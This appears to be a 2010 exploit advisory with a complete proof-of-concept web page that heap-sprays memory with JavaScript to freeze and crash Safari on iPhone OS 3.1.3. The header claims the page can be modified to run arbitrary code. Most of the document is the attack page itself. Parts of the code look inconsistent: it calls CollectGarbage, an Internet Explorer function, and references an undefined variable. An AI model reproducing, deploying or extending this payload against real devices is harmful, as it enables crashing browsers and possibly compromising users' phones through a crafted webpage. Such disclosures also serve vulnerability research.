|
# Exploit Title: Remote DoS on Safari for iPhone & iPod Touch
# Date: 26/03/2010
# Author: Nishant Das Patnaik
# For more of Nishant's research, please visit:
# http://nishantdaspatnaik.yolasite.com/research.php
# Tested on: iPod Touch 3G (iPhone OS 3.1.3)
# Description: An attacker may direct the user to visit a specially crafted webpage that can lead the Safari browser on iPhone & iPod Touch running iPhone OS 3.1.3 to freeze and finally crash. The attacker can modify to the PoC to run arbitrary code on the device.
# Code:
---------PoC STARTS HERE----------------
<html>
<title> Remote DoS on Safari for iPhone & iPod Touch </title>
<body>
<script language="JavaScript">
var size="%u03e8";
var matrix = new Array();
var slope = 0x100000-(size.length*2+0x01020);
var bomb = unescape("%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000");
while(bomb.length<slope/2) { bomb+=bomb;}
var lh = bomb.substring(0,slope/2);
delete bomb;
for(i=0; i<0xC0; i++) {
matrix[i] = lh + size;
}
CollectGarbage();
var slope1=unescape("%u0b0b%u0b0b%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000AAAAAAAAAAAAAAAAAAAAAAAAA");
var matrix1 = new Array();
for(var x=0;x<1000;x++) matrix1.push(document.createElement("img"));
function ready() {
out1=document.createElement("tbody");
out1.click;
var out2 = out1.cloneNode();
out11.clearAttributes();
out1=null; CollectGarbage();
for(var x=0;x<matrix1.length;x++) matrix1[x].src=slope1;
out2.click;
}
</script>
<script>window.setTimeout("ready();",800);</script>
<center>
<h1> Remote DoS on Safari for iPhone & iPod Touch </h1>
<h2> (C) Nishant Das Patnaik </h2>
</center>
</body>
</html>
---------POC ENDS HERE----------------
|
推荐
评论(0条)
